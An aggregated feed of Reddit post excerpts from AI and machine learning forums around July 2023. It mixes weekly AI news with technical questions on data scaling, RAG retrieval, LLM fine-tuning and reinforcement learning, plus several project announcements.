    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News & Insights Stability AI released SDXL 1.0, the next iteration of their open text-to-image generation model. SDXL 1.0 has one of the largest parameter counts of any open access image model, built on a new architecture composed of a 3.5B parameter base model and a 6.6B parameter refiner [Details]. Amazon introduced AWS HealthScribe, an API to create transcripts, extract details and create summaries from doctor-patient discussions that can be entered into an electronic health record (EHR) system. The transcripts from HealthScribe can be converted into patient notes by the platform’s machine learning models [Details]. Researchers from Nvidia and Stanford, among others, unveiled VIMA, a multimodal LLM with…  ( 11 min )
    Best free/paid celeberty text to speech generators
What are currently the best AI voice generators for celebrities like Elon Musk, Joe Biden, Joe Rogan, and so on? I've seen a few online sites that are free but have many restrictions, insane waiting times, and low-quality output. The only paid alternative I've seen recommended is ElevenLabs, but you're supposed to upload your own videos or voice recordings there to "create" the voice yourself. I don't know how complicated that is, and I was primarily looking for existing good-quality paid or free voice generators for many different celebrities. submitted by /u/Arceus7 [link] [comments]  ( 8 min )
    any AI models for industrial design?
Are there any AI models that focus on, or do well with, industrial/mechanical subjects like weapons, spaceships, cars, machinery, etc.? Stable Diffusion often doesn't seem to interpret a lot of these prompts very well, or the results are more "artistic" and rather incoherent-looking. submitted by /u/Nofabe [link] [comments]  ( 8 min )
    Extract list of events using AI
    I wish to extract a list of events from different websites and create a detailed list (event name, date, address), on a spreadsheet for example. Do you know which tool I could use to do it and/or prompts in known AI tools? submitted by /u/newz12 [link] [comments]  ( 8 min )
    Google testing AI news writing tool. What are your thoughts about it?
    submitted by /u/TexteroAI [link] [comments]  ( 8 min )
    The point of 10,000 LLMs
Hi all, I would really like to understand the logic behind these 1000 different LLMs that get launched every month. "Ours has 75 billion params, it can chat"... pfft. I barely even get a chance to open another AI window besides ChatGPT-4; Bing sucks with its 4,000-token limit, and Bard is useless. So these new chat AIs, e.g. this Llama 2: what exactly is so special? What am I missing here? submitted by /u/Assholefrmcoinexchan [link] [comments]  ( 8 min )
    Alternative to Noty.ai
    Are there any similar alternatives to noty.ai? I really like it but if there any alternatives that might extend to Zoom as well would be great. submitted by /u/P_H_i_X [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/27/2023
OpenAI, the company behind the popular ChatGPT, is coming out with its own open-source large language model (LLM), codenamed G3PO, to compete with Microsoft x Meta's Llama 2 AI.[1] Four generative AI pioneers (OpenAI, Microsoft, Google and Anthropic) launched the Frontier Model Forum, which will focus on 'safe and responsible' creation of new AI models.[2] As OpenAI's ChatGPT takes the tech world by storm, Chinese educational technology firm NetEase Youdao launched its large model, along with up to six applications, on Thursday, which marked the birth of one of China's first large models in the education sector.[3] Chatbots such as Eva AI are getting better at mimicking human interaction, but some fear they feed into unhealthy beliefs around gender-based control and violence. Replika, the most popular app of the kind, has its own subreddit where users talk about how much they love their "rep", with some saying they had been converted after initially thinking they would never want to form a relationship with a bot.[4] Sources: [1] https://windowsreport.com/g3po-ai/ [2] https://www.infosecurity-magazine.com/news/openai-microsoft-google-anthropic/ [3] https://www.chinadaily.com.cn/a/202307/28/WS64c3226ea31035260b8190a4.html [4] https://www.theguardian.com/technology/2023/jul/22/ai-girlfriend-chatbot-apps-unhealthy-chatgpt submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Telling Steven he is an NPC 🤯 Our first TTS conversation - Update 5
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
    Insane AI voice replication
    submitted by /u/the_anonymizer [link] [comments]  ( 8 min )
  • Open

    [D] Major issue found with MinMax data scaling.
I have a well-performing model on Azure AI and I am pulling it down locally so that I can use it. During pre-processing I go through these steps: re-balance data (SMOTE, undersample); lag data; get all min/max values into a config; scale data with min/max. For context, step 3 (the config) works like this: I take the min and max values of the entire dataset (before the split) for each feature. I then append these to my local version and apply the scaling, so the local dataset uses the exact same scaling parameters as the original pre-processing. I cannot show the full dataset due to privacy and the fact that it has 3000+ features, but I will show one row with a couple of columns to compare the Azure AI training data and my local pre-processing, which uses the exact same code/system. Azure AI dataset: Feature1 0.637952, Feature2 0.645434, Feature3 0.641118. Local dataset: Feature1 0.461278, Feature2 0.462896, Feature3 0.472841. I have confirmed this is the exact same row of data, because I have timestamped each row and matched them up. Yet the scaled values differ, even though the code is a carbon copy and the same min and max values are used as in the original dataset for training and testing. Does anyone know a better way to scale data and ensure scaling stays consistent wherever the model is used? Or have I maybe missed something? submitted by /u/paddockson [link] [comments]  ( 9 min )
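The usual way to make scaling reproducible across environments is to fit the min/max once, serialize the exact parameters, and only ever transform with them elsewhere, never refit. A minimal sketch with made-up numbers (scikit-learn's MinMaxScaler persisted with joblib achieves the same thing):

```python
import json
import numpy as np

# Minimal sketch with made-up data: fit min/max ONCE, persist the exact
# parameters, and only ever transform with them. Never refit locally.
train = np.array([[1.0, 10.0],
                  [3.0, 30.0],
                  [5.0, 50.0]])
params = {"min": train.min(axis=0).tolist(),
          "max": train.max(axis=0).tolist()}
config = json.dumps(params)                    # ship this alongside the model

# On the local side: load the persisted parameters and transform only.
p = json.loads(config)
lo, hi = np.array(p["min"]), np.array(p["max"])

def scale(X):
    return (X - lo) / (hi - lo)

row = scale(np.array([[3.0, 30.0]]))
print(row)                                     # [[0.5 0.5]]
```

If identical parameters still produce different values for the same timestamped row, the divergence usually comes from an earlier pipeline step (e.g. SMOTE or the lagging reordering or resampling rows before scaling) rather than from the scaler itself.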
    [P] Harness the Power of ML
I built an automatic machine learning platform called Heimdall ML which helps anyone quickly deploy machine learning models to production. At a high level, my platform will: ingest your data as a .csv file; clean up any irregularities and prepare the data for modeling; build the most optimal model for your use case; show you a results report covering both the performance and biases associated with your model; create an API endpoint to help you build new experiences with your model. The cool thing about my platform is that it allows you to embed machine learning into your own platform with ease. You have the ability to fully customize your experience to wow your customers. I built this entire platform by myself from scratch and am looking to grow the user base! The tool is completely FREE for hobby users! You can crunch some pretty large datasets (80 columns, 10K rows) with just the free version. If you have a use case that needs some big-data processing, you will have to reach out to me directly so I can help set up a good plan for you. The reason for this is that the project is completely self-funded and I want to be able to control the costs. I was inspired to create this platform while I was in grad school, because many of the firms giving us talks would describe how they had teams of engineers who build out pipelines to bring a model to production. I personally believe there can be an easier way. Heimdall ML: https://www.heimdallapp.org Loom: https://www.loom.com/share/86ae62849f874a2da255911e2d5db762?sid=5e1efddb-9556-4e3d-84fd-e2ff7198a98c submitted by /u/jreji [link] [comments]  ( 9 min )
    Can someone make an AI Therapist that isn’t just a chat? [P]
One that looks like a person, so you can see their expressions and listen to their voice. Trained on up-to-date medical research and communication/empathy skills. Therapy is so expensive and inaccessible to too many people. submitted by /u/Sgdoc70 [link] [comments]  ( 8 min )
    [D] HuggingFace changed the license of one of its most important libraries
    TGI is no longer commercially permissible. That's really sad. https://github.com/huggingface/text-generation-inference/commit/bde25e62b33b05113519e5dbf75abda06a03328e submitted by /u/paulo_zip [link] [comments]  ( 8 min )
    [D] How do large companies get their LLMs to give sub second responses?
Curious how companies like Google, MSFT, etc. are able to have their LLMs and ML models give very fast responses. Do they just have crazy powerful GPUs, or do they split inference among GPUs? submitted by /u/candyman54 [link] [comments]  ( 8 min )
    [D] Hugging Face, GitHub and more unite to defend open source in EU AI legislation
    Full Article: https://venturebeat.com/ai/hugging-face-github-and-more-unite-to-defend-open-source-in-eu-ai-legislation/ submitted by /u/EmbarrassedHelp [link] [comments]  ( 8 min )
    [P] Revolutionizing agriculture: LLM-Powered Agent for Soil Fertility and Crop Production Recommendations using real time soil devices and sensor data
Check out this project idea to revolutionize agriculture and bolster global food security. We all know that farmers face challenges like erratic weather, depleting resources, and the need for sustainable crop yields. The idea: an IoT-driven system with soil sensors, fueled by a custom Large Language Model (LLM) trained on soil data. Concept: empowering farmers with real-time soil data via IoT devices and sensors. Leveraging the LLM's capabilities, the system analyzes this data to provide personalized strategies for enhancing soil fertility and suggesting the best crops for specific conditions. How it works: IoT devices and soil sensors continuously gather vital soil parameters - moisture, pH, nutrients, and temperature. This data is processed by the LLM, generating actionable insights for farmers. Benefits: picture a world where data-driven decisions and sustainable practices dominate agriculture. This system boosts productivity, optimizes resource management, and enhances profits. Embracing sustainability and informed choices ensures an eco-friendly agricultural sector. Impact on food security: enhanced productivity means more than just profit; it ensures food security worldwide. By aiding farmers in sustainable and efficient practices, we contribute to a steady supply of nutritious food for all. submitted by /u/s_abhiishek [link] [comments]  ( 9 min )
    [D] Recommendation on studying Deep Learning (Theory + Implementation) / Alternate to Deep Learning Specialization by Andrew Ng?
I've just finished the Machine Learning Specialization by Andrew Ng and I'm planning to dive deeper into Deep Learning concepts, theory, and implementation. I would like to get deeper insight into the fundamental mathematical concepts of NN and DL models and build better intuition for how these models work. I also want to understand, theoretically, how more neurons capture non-linear relationships in data, what exactly a hierarchical representation of data is, and how hidden layers form and learn from these abstract representations. Apart from theory, I also want to learn the implementation of these models. I have some exposure to the TF library, but I'm okay with learning PyTorch too, if needed. I need a course or any other content recommendations for the best options to learn all this. So far, I've been recommended the Deep Learning Specialization by Andrew Ng, but I would love to hear any alternate option or anything that I can do alongside that specialization. Thanks! submitted by /u/Total-Opposite-8396 [link] [comments]  ( 9 min )
    [R] What is a fairly good results for sacrebleu?
I ran my own model on translation (Multi30k). I trained a recurrent model and the sacrebleu score is 28. I also tested the BLEU score provided by NLTK and it is 60. Is that good or bad? submitted by /u/Puzzleheaded-Cry4262 [link] [comments]  ( 8 min )
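One thing to check before comparing the two numbers: sacrebleu reports BLEU on a 0-100 scale, while NLTK's corpus_bleu returns a value in [0, 1], and the two also differ in tokenization, so 28 and 60 are not directly comparable. A minimal BLEU with made-up sentences (my own simplified version, single reference, bigrams only) shows the scale difference:

```python
import math
from collections import Counter

def ngrams(tokens, n):
    return Counter(tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1))

def bleu(hyp, ref, max_n=2):
    """Minimal single-reference BLEU: geometric mean of clipped n-gram
    precisions times a brevity penalty. Illustrative only."""
    precisions = []
    for n in range(1, max_n + 1):
        h, r = ngrams(hyp, n), ngrams(ref, n)
        overlap = sum(min(c, r[g]) for g, c in h.items())  # clipped counts
        precisions.append(overlap / max(1, sum(h.values())))
    bp = min(1.0, math.exp(1.0 - len(ref) / len(hyp)))     # brevity penalty
    return bp * math.exp(sum(math.log(p) for p in precisions) / max_n)

hyp = "the cat sat on the mat".split()
ref = "the cat is on the mat".split()
score = bleu(hyp, ref)
print(round(score, 4), round(100 * score, 1))   # 0.7071 70.7
```

So an NLTK-style 0.28 would correspond to a sacrebleu-style 28; if NLTK really returned 60 on a 0-1 scale, something else (tokenization, smoothing, sentence vs. corpus averaging) is off.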
    [D] Please advise me on my masters
Please give me advice on doing well in my masters in ML. I'm going to start my masters in machine learning soon; I have one month to go, but I feel so underprepared to start this journey. To give you a bit of background, I studied electrical engineering in my UG. I did very badly; I was very depressed and couldn't study at all. Somehow I managed to scrape through the four years, and now, after working in software testing for two years, I decided to take a leap into machine learning because it looked so interesting and I wanted a change. I'm scared now because my coding knowledge isn't very good and I don't know how much of the math I know is useful for the degree I plan to do. Please help me, I'm panicking. I know you might say it's pretty irresponsible how I've handled my life till now, but please overlook that and tell me what I can do better now. submitted by /u/ObjectiveShower9133 [link] [comments]  ( 9 min )
    [D] Recommendation system giving same response to every User
I am using the Gorse open-source recommendation system for my project. It was working nicely, but for the last 1-2 days it has been giving the same recommendation to every user. I have about 60 items and about 650 users showing in the Gorse dashboard. Can anyone explain why this is happening? I am not an expert in ML; I am willing to share my configuration if you want. submitted by /u/Responsible_Delay418 [link] [comments]  ( 8 min )
    [D] Having trouble with RAG on company domain data
I have a data set that isn't that large, ~200 PDFs. I have done the regular RAG approach with LangChain: extracting text, splitting into chunks, embedding with OpenAI embeddings, and FAISS vector storage. However, when I do a similarity search with a question I would like answered, it returns the wrong context. The documents are semi-structured information about examined bridges. A question I would like answered is, e.g., 'what is the construction date of bridge X?'. When I input this question I get a lot of context about the construction dates of other bridges. I think this is because the bridge names are not explicitly mentioned in the text. I tried adding the bridge name and document name to the page-content string of the chunks, but this does nothing. Does anyone have any tips on improving embedding retrieval in this case? submitted by /u/Dustwellow [link] [comments]  ( 9 min )
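One approach that often helps here is metadata filtering rather than stuffing the bridge name into the text: tag each chunk with its bridge, extract the bridge name from the question, and restrict the similarity search to matching chunks (LangChain's FAISS wrapper accepts a filter argument on similarity_search in recent versions, though I'd verify against your installed version). A library-free sketch of the idea, with made-up data and a toy bag-of-words embedding standing in for OpenAI embeddings:

```python
import numpy as np

# Hypothetical sketch: filter chunks by metadata (bridge name) BEFORE the
# similarity search, so context from other bridges never competes.
chunks = [
    {"text": "Construction date: 1962.", "bridge": "Bridge A"},
    {"text": "Construction date: 1987.", "bridge": "Bridge B"},
]

def embed(text):                    # toy stand-in for real embeddings
    vocab = "construction date 1962 1987".split()
    return np.array([text.lower().count(w) for w in vocab], dtype=float)

def retrieve(query, bridge):
    candidates = [c for c in chunks if c["bridge"] == bridge]   # metadata filter
    q = embed(query)
    sims = [q @ embed(c["text"]) for c in candidates]
    return candidates[int(np.argmax(sims))]

hit = retrieve("what is the construction date?", bridge="Bridge B")
print(hit["text"])
```

The design point: embeddings of near-identical boilerplate ("Construction date: ...") are indistinguishable, so disambiguation has to happen via structured metadata, not via the vector similarity itself.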
    [P] Tool to auto compile/quantize models
Hey guys, we have an internal tool that preps our models for inference by compiling them to ONNX/TensorRT and quantizing them to INT8/FP16. It also benchmarks them for accuracy loss and latency. It's kind of like GitHub Actions for your model. We are considering releasing it as a standalone product; would anyone be interested? submitted by /u/throwaway65161354 [link] [comments]  ( 8 min )
    [D] Domain adaptation on LLAMA2
Hi, I am trying domain adaptation on my company's data. The data is a set of documentation that we have for a product. We want to take Llama 2 and feed all this data to it. I have fine-tuned Llama 2 using PEFT on a CLM task, where the data looks like [Title:\nContent:]. When I now try to prompt the model, I have to provide the prompt in a similar format, but I want the model to understand that I want to perform a QA task on the data, while retaining any other knowledge the model previously had. What am I missing here, or what am I doing wrong? How can I set up this task better? Any pointers will help. Thanks! submitted by /u/ProfessorShit [link] [comments]  ( 9 min )
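A common fix for this is to mix instruction-style QA pairs into the fine-tuning data alongside the raw documents, then prompt with the same template at inference, so the model learns the task format as well as the domain. A formatting sketch (the "### Instruction/Response" markers and the example strings below are my own illustrative convention, not something Llama 2 requires):

```python
# Illustrative formatting only: mix raw documents with synthetic QA pairs so
# the fine-tuned model learns both the domain and the QA task format.
def format_doc(title, content):
    return f"Title: {title}\nContent: {content}"

def format_qa(question, answer):
    return f"### Instruction:\n{question}\n\n### Response:\n{answer}"

corpus = [
    format_doc("Exporting data", "Use File > Export to save a report."),
    format_qa("How do I export a report?", "Use File > Export."),  # synthetic QA
]
prompt = format_qa("How do I export a report?", "").rstrip()
print(prompt.splitlines()[0])      # ### Instruction:
```

The synthetic QA pairs can be generated from the documents themselves (e.g. with a larger model); plain CLM on [Title:\nContent:] alone teaches continuation, not question answering, which is likely what you're running into.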
    [R] Implementing Yolov3 with Octave Convolutions
Hi all, I am trying to implement, or rather modify, a given YOLOv3 implementation to use Octave Convolutions instead of 2D convolutions in the architecture. The details are in this Stack Overflow question. I hope someone is able to help me. submitted by /u/dulre [link] [comments]  ( 8 min )
    [R] Communicative Agents for Software Development (Autonomous LLM agent as a DEV company)
    ChatDev Paper: https://arxiv.org/abs/2307.07924 TL;DR: - Tsinghua University's team has developed ChatDev, a virtual software development company staffed by autonomous LLM agents - The LLM agents act as employees and follow a waterfall model: design -> implement -> test -> documentation - The agents have role specialization (CEO, DEV, BA ...), inception prompting, and self-reflection - The researchers designed 70 user requirements and then analyzed the software produced by ChatDev - On average, each piece of software generated by ChatDev had 17.04 files, mitigated 13.23 potential code bugs caused by code hallucinations, took 409.84 seconds to generate, and cost $0.2967 to produce. [Figure: Chat chain] submitted by /u/michaelthwan_ai [link] [comments]  ( 9 min )
    [D] Milvus 2.0 or higher with GPU enabled
    Is there a way to use Milvus 2.0 or higher with GPU-enabled indexing and vector search? I can't find anything in their documentation for this; it seems to be available only in version 1.1. Any help will be appreciated. TIA submitted by /u/adiraat [link] [comments]  ( 8 min )
    [P] Has anyone tried to work with StarCoder?
    I recently found out about StarCoder and have been trying to play with it and figure it out in a Colab notebook. Unfortunately, it’s much more difficult to download than normal models on Hugging Face, and I’m running into a KeyError when I call the model. I don’t want to spam with code or pictures, but has anyone worked with StarCoder on Hugging Face and been successful? submitted by /u/AJ1043 [link] [comments]  ( 9 min )
    [D] Can anyone explain what Karpathy's recent llama2.c is doing underneath? I am not a CS student
    Hi, I am not a CS student. I want to know what's exactly going on with llama2.c. Is the Python code converted to C and then compiled? Or only weights are converted to C? Is the network written in C? If I have to write a small network (say, a simple 2 stage Fully connected network) and do a similar thing like llama2.c, then how to proceed? submitted by /u/panini_deploy [link] [comments]  ( 9 min )
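To the question of how to proceed with a small fully connected network: the llama2.c recipe is to export the trained weights as flat arrays and hand-write the forward pass as plain loops; only the weights come from training, the network itself is ordinary code. The sketch below does exactly that in Python with made-up weights; porting it to C is mostly a mechanical translation of the same loops.

```python
import math

# Sketch: the llama2.c approach applied to a tiny 2-layer fully connected
# net. Weights live in flat row-major arrays, as they would in a C buffer,
# and the forward pass is explicit loops -- no framework involved.
def matvec(W, x, rows, cols):
    return [sum(W[r * cols + c] * x[c] for c in range(cols)) for r in range(rows)]

def forward(x, W1, b1, W2, b2, hidden, n_in, n_out):
    h = matvec(W1, x, hidden, n_in)
    h = [math.tanh(v + b) for v, b in zip(h, b1)]   # layer 1 + nonlinearity
    o = matvec(W2, h, n_out, hidden)
    return [v + b for v, b in zip(o, b2)]           # layer 2 (linear)

# Toy weights standing in for an exported checkpoint.
out = forward([1.0, 2.0], W1=[1, 0, 0, 1], b1=[0, 0],
              W2=[1, 1], b2=[0.5], hidden=2, n_in=2, n_out=1)
```

So in llama2.c neither Python is compiled to C nor weights "converted to code": the transformer's forward pass is written by hand in C, and the checkpoint weights are loaded into plain float buffers exactly like `W1`/`W2` above.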
    [R] Scaling TransNormer to 175 Billion Parameters
    https://arxiv.org/abs/2307.14995 submitted by /u/hzj5790 [link] [comments]  ( 8 min )
  • Open

    Can I turn off the target network in `SB3` by setting `target_update_interval=-1`?
    I am using DQN through `SB3`. I would like to know if I can turn off the target network by setting `target_update_interval=-1`. I have some sample code over here -
    import gymnasium as gym
    from stable_baselines3 import DQN
    env = gym.make("MountainCar-v0")
    model = DQN("MlpPolicy", env, learning_rate=4e-3, batch_size=128, buffer_size=10000, learning_starts=1000, gamma=0.98, train_freq=16, gradient_steps=8, exploration_fraction=0, exploration_final_eps=0, verbose=1, target_update_interval=-1)
    model.learn(total_timesteps=120000, log_interval=4)
    submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
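I can't confirm from the docs that -1 is a supported value for `target_update_interval`, so it is worth checking the SB3 DQN source. A more explicit way to get "no target network" behavior is to sync the target with the online network every step (interval 1, tau 1.0); the update rule that implements this is sketched below in plain Python (not SB3 code):

```python
# Sketch of the target-network update rule DQN-style agents use.
# Syncing every step with tau = 1.0 makes the target identical to the
# online net, which effectively disables the target network.
def polyak_update(online, target, tau):
    return [tau * o + (1.0 - tau) * t for o, t in zip(online, target)]

online = [0.3, -0.8, 1.2]
target = [0.0, 0.0, 0.0]

# Hard update every step (interval = 1, tau = 1.0):
target = polyak_update(online, target, tau=1.0)
```

With tau < 1.0 the same rule gives the soft (Polyak) update; with a large interval and tau = 1.0 it gives the classic periodic hard copy.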
    Training model using SB3 on pettingzoo mpe
    Hey, so I am training my baseline model using A2C on the simple spread environment, and no matter how I change and test different parameters, the total reward at evaluation is highly negative. Any help with that would be appreciated. (I used the following tutorial as reference: https://pettingzoo.farama.org/tutorials/sb3/waterworld/) submitted by /u/bruhhhwhats [link] [comments]  ( 8 min )
    Recreating results of DrQ algorithm, please help
    For quite some time now I have been looking to recreate the results of the following paper on the Atari-100k benchmark. The paper poses two slightly different algorithms, one for SAC and one for DQN; my work only focuses on the DQN version. IMAGE AUGMENTATION IS ALL YOU NEED: REGULARIZING DEEP REINFORCEMENT LEARNING FROM PIXELS https://openreview.net/pdf?id=GY6-6sTvGaf Despite this, my results have come up significantly short of the results claimed by the paper, so I am looking for anyone to have a look and spot anything I may have done wrong. All the code is on the following GitHub: https://github.com/VIPTankz/DeepLearningDrQ/tree/main There should also be everything you need to run the code if you wish to do so. The authors claim a human-normalised score of 0.270, but my code only achieves 0.108. Any help would be much appreciated! Also worth noting: for evaluation, the authors use 125k steps, whereas I'm using the more recent standard of 100 episodes, irrespective of length. I highly doubt, however, that this causes the difference in results. submitted by /u/VIPTankz123 [link] [comments]  ( 9 min )
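For anyone comparing against the paper's numbers, the human-normalised score is computed per game as (agent - random) / (human - random) and then aggregated across games (mean or median). A sketch with made-up per-game scores, just to show the aggregation:

```python
# Standard human-normalised score used on Atari-100k:
# (agent - random) / (human - random), aggregated over the 26 games.
def human_normalized(agent, random_score, human):
    return (agent - random_score) / (human - random_score)

# Made-up per-game raw scores, for illustration only.
scores = [
    human_normalized(500.0, 100.0, 1000.0),
    human_normalized(50.0, 20.0, 220.0),
]
mean_hns = sum(scores) / len(scores)
```

Worth double-checking which reference random/human scores and which aggregate (mean vs. median) the DrQ paper uses, since a mismatch there alone can move the headline number noticeably.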
    Confused about Frame Skipping in RL
    How does frame skipping result in better performance, versus taking an inference every frame, for RL algorithms? Wouldn't taking an inference every frame speed up training, as you would have more steps to train on in the same amount of time? The only downside I can think of with no frame skip is that consecutive steps become closer to each other, but I don't understand whether that leads to worse performance, and if it does, why. For context, I have an environment where frames are relatively slow to generate (I'm only getting 1000 frames per minute from each env, and I can only run 6 instances on my PC at the same time). While off-policy algorithms like SAC would probably be better suited to the task, I've been having really great success with PPO, and am reluctant to spend more time learning and fine-tuning SAC, as I've heard it can take as long as DDPG to converge. submitted by /u/IllCommunication6165 [link] [comments]  ( 9 min )
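For reference, frame skipping is usually implemented as action repeat: one policy decision is held for k frames and the intermediate rewards are summed into a single transition, so each stored step carries more environment progress and credit assignment spans fewer, more distinct decisions. A minimal sketch with a toy environment (names are illustrative):

```python
# Sketch of an action-repeat ("frame skip") wrapper: one policy decision
# is held for k frames, and the k rewards are summed into one transition.
def skip_step(env_step, state, action, k=4):
    total_reward, done = 0.0, False
    for _ in range(k):
        state, r, done = env_step(state, action)
        total_reward += r
        if done:
            break
    return state, total_reward, done

# Toy environment: state counts frames, reward 1 per frame, ends at frame 10.
def env_step(state, action):
    state += 1
    return state, 1.0, state >= 10

s, r, d = skip_step(env_step, state=0, action=0, k=4)
```

With k = 4 you run a quarter as many inference and gradient passes per frame of experience, and consecutive stored states are more decorrelated, which is the usual argument for why skipping helps rather than hurts.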
  • Open

    Understanding license plate recognition with the CCPD computer vision datasets
    In various fields, such as traffic management, law enforcement, and parking management, license plate recognition is a crucial application of computer vision that is used to analyze license plates. In this article, we will review the Chinese City Parking Dataset (CCPD), which is one of the most widely used computer vision datasets for tasks that… Read More » The post Understanding license plate recognition with the CCPD computer vision datasets appeared first on Data Science Central.  ( 20 min )
  • Open

    Deepmind's RT-2: New model translates vision and language into action
    submitted by /u/nickb [link] [comments]  ( 8 min )
    LLAMA and ChatGPT Are Not Open-Source
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Finding the imaginary part of an analytic function from the real part
    A function f of a complex variable z = x + iy can be factored into real and imaginary parts: f(x + iy) = u(x, y) + i v(x, y), where x and y are real numbers, and u and v are real-valued functions of two real variables. Suppose you are given u(x, y) and you want to find v(x, y). The function v is called […] Finding the imaginary part of an analytic function from the real part first appeared on John D. Cook.  ( 5 min )
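The recovery of v rests on the Cauchy-Riemann equations, v_x = -u_y and v_y = u_x, which hold for any analytic f. A quick numeric sanity check for f(z) = z^2, where u = x^2 - y^2 and v = 2xy:

```python
# Numeric check of the Cauchy-Riemann equations for f(z) = z^2:
# with u(x, y) = x^2 - y^2 and v(x, y) = 2xy, we expect
# v_x = -u_y and v_y = u_x at every point.
def u(x, y): return x * x - y * y
def v(x, y): return 2 * x * y

def partial(f, x, y, wrt, h=1e-6):
    # Central finite difference in the chosen variable.
    if wrt == "x":
        return (f(x + h, y) - f(x - h, y)) / (2 * h)
    return (f(x, y + h) - f(x, y - h)) / (2 * h)

x0, y0 = 1.3, -0.7
vx, vy = partial(v, x0, y0, "x"), partial(v, x0, y0, "y")
ux, uy = partial(u, x0, y0, "x"), partial(u, x0, y0, "y")
```

Given only u, these two equations determine the gradient of v, so integrating them recovers v up to an additive constant, which is the construction the article describes.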

  • Open

    Max / min values for weights and biases
    I was wondering what the recommended maximum and minimum values for weights and biases are for random generation of networks and mutation submitted by /u/Mildu12 [link] [comments]  ( 8 min )
    What exactly are liquid neurons?
    I heard about them recently. Can someone give me the basics, and maybe point me to a couple of papers? submitted by /u/SamuraiGoblin [link] [comments]  ( 8 min )
    Diving Into Image Dataset Preparation for Object Detection in AI
    submitted by /u/moseich [link] [comments]  ( 8 min )
  • Open

    [D] For LMs, what works other than scaling?
    Increasing the number of parameters is the best-known way to increase the quality of a language model. What methods — instruction tuning and RLHF aside — deliver the next-best amount of ROI? submitted by /u/ndronen [link] [comments]  ( 8 min )
    [D] Viability of fine tuning for domain knowledge
    The consensus is that fine tuning LLMs works reasonably for smaller scale instruction tuning, where you pass in ~1k-10k input/output examples to modify the model output. There seems to be a lot of contradictory info regarding fine tuning for domain knowledge, where you pass in large amounts of unsupervised, domain scale data. Per OpenAI: People that can’t get finetuning to work are often asking for orange juice from a cow. LLMs are pretrained (hence the name: Generative Pretrained Transformer) They already have all the knowledge you will need (with some exceptions). You cannot teach it anything new, you can only teach it a specific pattern. People have not defined their goal clearly enough for a human to do the task. LLMs are not magic, if a human cannot understand the task, the L…  ( 9 min )
    Looking for a help [P]
    I am a graduate student in the computer science / medical informatics field. I was asked to search for a project using ML to diagnose, detect, or improve treatment of any disease. Any ideas? It can be any project. #BioInformatics #MedicalInformatics #ComputerScience #MachineLearning submitted by /u/Adorable-Bug-928 [link] [comments]  ( 8 min )
    [R] Questions about dictionary learning
    I’m a PhD student and a problem I’ve been working on has connections to dictionary learning. I’d like to pursue this connection, but neither myself or my advisor have much knowledge of the dictionary learning or the surrounding literature. Questions: Is dictionary learning an active area of interest for modern ML? I understand that it might be more niche than some of the topics getting headlines these days, but I’d be curious to hear about applications where dictionary learning is used/reasonably competitive. Are there any references in dictionary learning that you’d consider to be “essential” reading? Thanks! submitted by /u/sjsjdhshshs [link] [comments]  ( 9 min )
    [Discussion] Help me pick the right master's programme!
    Hello Reddit, I'm currently at a crossroads in my academic journey and I could use some insights from those more experienced in the field of machine learning and AI. I'm choosing between two programs: Applied Data Science and AI and Data Science and AI. Each program has its own unique structure and focus, which I will briefly summarize below. Applied Data Science and AI is a two-year program with a focus on practicality and project-based learning. It includes the following core courses: Introduction to Data Science; Python for Data Scientists; Applied Mathematical Thinking; Statistical Methods for Data Science; Applied Machine Learning; Computational Techniques for Large-Scale Data; Research Methods for Data Science; Master’s Thesis in Data Science. The program also offers the flexibility to choose optional courses to tailor my learning towards my own interests. On the other hand, Data Science and AI takes a more rigorous, math-intensive approach in its first year with compulsory courses such as: Introduction to data science and artificial intelligence; Nonlinear optimization; Stochastic processes and Bayesian statistics; Design of AI systems. The second year involves a Master's thesis and elective courses from a diverse range of topics. Given that my ultimate goal is to become a proficient machine learning developer, I'm leaning towards the Applied Data Science and AI program for its hands-on approach. However, I'm aware that the Data Science and AI program's heavy math focus in the first year could provide a robust theoretical foundation that could be beneficial. I'd love to hear from anyone who has been through similar programs or who works in the field. Which of these two programs do you think would best prepare me for a career in machine learning? How important is a deep mathematical foundation versus a more applied, project-based learning approach? Thank you in advance! submitted by /u/ZoomedBoxTrade [link] [comments]  ( 9 min )
    [D] What neural networks can be an alternative to GARCH/ARCH models for macroeconomic modelling
    I am looking for topics for my master's thesis, and I came across GARCH/ARCH models and their application to economics. My idea is to use neural networks as an alternative with better performance. Are there any resources I can read about whether this has been done and what types of neural networks are used? submitted by /u/AnyJello605 [link] [comments]  ( 8 min )
    [P] New encryption SDK/proxy tool to protect vector embeddings
    We're looking for some beta testers and input on our newest project called Cloaked AI that allows you to protect sensitive data that gets stored as vector embeddings (and metadata) in a vector database. You can join the beta tester waitlist here (we'll be rolling out access in the next few weeks). But here are some FAQs about why protecting vector embeddings matters, etc. Why should I be worried about sensitive data in vector embeddings? To a human, vectors are meaningless. But to the AI, the vectors contain all of the meaning found in the original sensitive data. Generative AI systems can recreate the original sensitive data to a high degree of accuracy (though in their own style). That means the data stored in vector databases are a significant security and privacy risk for companies t…  ( 10 min )
    [D] How nuanced are reward functions in RLHF?
    I'm still learning the basic concepts here, as I explore the creative potential of LLMs — one potential problem I've been thinking about is how these models come to understand good or bad answers. I know that once they reach the public, the feedback loop is fairly binary -- Yes, this was a good result, or No, this was a poor result. It seems like a lot of the subjective detail might be lost (e.g. Why was it a bad result?) and I was wondering if this detail is captured elsewhere in the training process. There is so much subjectivity involved in creative works, I wonder if this is why we tend to see the output of LLMs as being creatively bland and/or uninspired (that is— by default, without extensive prompting) submitted by /u/kaigani [link] [comments]  ( 9 min )
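For what it's worth, RLHF reward models are usually trained on pairwise comparisons ("response A is better than B") rather than bare thumbs up/down, fitted with a Bradley-Terry style loss; the learned scalar reward therefore encodes graded preference, though the "why" behind a judgment is indeed never captured explicitly. A sketch of that loss:

```python
import math

# Sketch of the Bradley-Terry loss used to train RLHF reward models:
# for a labeled pair (chosen, rejected), minimize
# -log sigmoid(r_chosen - r_rejected), pushing the reward margin up.
def preference_loss(r_chosen, r_rejected):
    return -math.log(1.0 / (1.0 + math.exp(-(r_chosen - r_rejected))))

good_margin = preference_loss(2.0, 0.0)   # reward model agrees with label
bad_margin = preference_loss(0.0, 2.0)    # reward model disagrees
```

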